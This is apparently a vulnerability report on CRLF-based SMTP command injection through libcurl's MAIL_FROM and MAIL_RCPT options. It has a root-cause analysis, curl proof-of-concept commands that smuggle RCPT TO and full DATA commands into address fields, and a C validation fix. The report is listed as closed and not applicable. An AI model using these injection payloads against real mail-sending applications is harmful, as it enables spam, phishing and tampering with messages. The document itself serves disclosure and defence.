SMTP Command Injection via CRLF in libcurl MAIL_FROM / MAIL_RCPT (lib/smtp.c)
Vulnerability Details
Summary
libcurl’s SMTP implementation fails to properly sanitize CRLF sequences in user-controlled inputs passed via CURLOPT_MAIL_FROM and CURLOPT_MAIL_RCPT.
The function smtp_parse_address() (lib/smtp.c:277) extracts any data following the closing > character as a raw suffix and incorporates it directly into SMTP commands using Curl_pp_sendf() without filtering control characters.
This behavior enables SMTP command injection, allowing an attacker to inject arbitrary SMTP commands when applications pass unsanitized input to these options.
Notably, other parts of the SMTP implementation (e.g., domain parsing at line 198 and custom commands at line 215) correctly enforce sanitization using REJECT_CTRL, highlighting an inconsistency in input validation.
Tested Versions
curl 8.5.0 (x86_64-pc-linux-gnu)
libcurl/8.5.0
OpenSSL/3.0.13
Platform: Ubuntu 24.04.4 LTS
The issue was also confirmed in the current git HEAD (commit 5fdb35a3bc) via source code review. The vulnerable logic in smtp_parse_address() remains unchanged.
Root Cause
At lib/smtp.c:277, the suffix portion of an email address is extracted and used without validation or sanitization of control characters (e.g., \r, \n).
Unlike other code paths (lines 198 and 215), this path does not apply REJECT_CTRL, allowing CRLF injection into the SMTP command stream.
Steps To Reproduce
Start a local SMTP listener:
nc -l -p 2525 > /tmp/smtp_raw.txt &
Send a request with CRLF injection in MAIL FROM:
curl --url "smtp://127.0.0.1:2525" \
--mail-from $'<[email protected]>\r\nRCPT TO:<[email protected]>' \
--mail-rcpt "[email protected]" \
--upload-file /dev/null
Inspect captured traffic:
cat /tmp/smtp_raw.txt
Expected Behavior
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
Actual Behavior
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
RCPT TO:<[email protected]>
The injected RCPT TO command is interpreted as a valid SMTP instruction.
Additional Injection Vectors
Injection via CURLOPT_MAIL_RCPT:
curl --url "smtp://127.0.0.1:2525" \
--mail-from "[email protected]" \
--mail-rcpt $'<[email protected]>\r\nRCPT TO:<[email protected]>' \
--upload-file /dev/null
Full SMTP Transaction Injection:
curl --url "smtp://127.0.0.1:2525" \
--mail-from $'<[email protected]>\r\nRCPT TO:<[email protected]>\r\nDATA\r\nSubject: injected\r\n\r\ninjected body\r\n.' \
--mail-rcpt "[email protected]" \
--upload-file /dev/null
This allows full control over the SMTP session, including message headers and body.
Recommendation
Apply consistent input validation to the suffix portion of parsed email addresses in smtp_parse_address():
Reject or sanitize control characters (\r, \n)
Apply the same REJECT_CTRL logic used in other SMTP parsing paths
Ensure that only valid SMTP address syntax is accepted
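An application-side version of that check, added here as an illustration (not code from this report or from curl): it rejects every control character, CR and LF included (the same class REJECT_CTRL guards on the other SMTP paths; the exact byte set used below is an assumption), and refuses any data after a closing `>`, which is the suffix the report describes reaching Curl_pp_sendf() unfiltered. The function name and the sample addresses are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Returns 1 if 'addr' is safe to hand to CURLOPT_MAIL_FROM / CURLOPT_MAIL_RCPT
 * (or curl_slist_append() for the recipient list), 0 otherwise.
 * Rejects any byte that could end or alter the SMTP command line (CR, LF and
 * every other ASCII control character), and rejects anything after a closing
 * '>', which is exactly the suffix smtp_parse_address() passes through. */
int smtp_address_is_safe(const char *addr)
{
    size_t len, i;
    const char *start, *end, *at;

    if (addr == NULL || (len = strlen(addr)) == 0)
        return 0;

    /* 1. No control characters anywhere, CRLF included (assumed byte set). */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (c < 0x20 || c == 0x7f)
            return 0;
    }

    /* 2. Optional <...> bracketing: if it opens, it must close at the very end,
     *    so no suffix survives past the '>'. */
    start = addr;
    end = addr + len;
    if (*start == '<') {
        if (addr[len - 1] != '>')
            return 0;
        start++;
        end--;
    }
    if (end <= start)
        return 0;

    /* 3. Exactly one '@', non-empty local part and domain, no spaces or
     *    stray angle brackets that could smuggle a second address. */
    at = memchr(start, '@', (size_t)(end - start));
    if (at == NULL || at == start || at == end - 1)
        return 0;
    if (memchr(at + 1, '@', (size_t)(end - at - 1)) != NULL)
        return 0;
    for (i = 0; start + i < end; i++) {
        unsigned char c = (unsigned char)start[i];
        if (isspace(c) || c == '<' || c == '>')
            return 0;
    }
    return 1;
}
```

Call it on every address before the curl_easy_setopt() / curl_slist_append() calls and abort the send on a 0 result; the report's injected MAIL FROM value is rejected at step 1.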
## Impact
## Summary:
An attacker controlling input to CURLOPT_MAIL_FROM or CURLOPT_MAIL_RCPT can inject arbitrary SMTP commands, leading to:
Unauthorized recipient injection (e.g., additional RCPT TO)
Manipulation of SMTP transaction flow
Injection of full email content (headers and body)
Potential abuse for spam, phishing, or data exfiltration
Report Stats
- Report ID: 3651975
- State: Closed
- Substate: not-applicable